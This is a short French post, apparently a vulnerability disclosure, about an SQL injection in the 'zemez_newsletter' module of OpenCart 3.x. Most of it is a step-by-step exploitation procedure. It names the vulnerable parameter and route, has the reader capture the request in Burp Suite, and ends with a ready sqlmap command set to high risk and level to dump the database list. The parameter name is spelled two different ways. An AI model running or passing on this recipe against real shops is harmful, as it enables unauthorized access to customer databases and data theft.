Opencart a une nouvelle faille de type SQL INJECTION sur le module newsletter en version v3.x.
la cyberattaque se fait via le paramètre emez_newsletter_email accessible depuis l’url /index.php?route=extension/module/zemez_newsletter/addNewsletter
Procédure
Vous aurez besoin de burpsuite et sqlmap .
Avec Burpsuite rendez vous dur l url :
http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
enregistrer la requête puis avec sqlmap :
sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs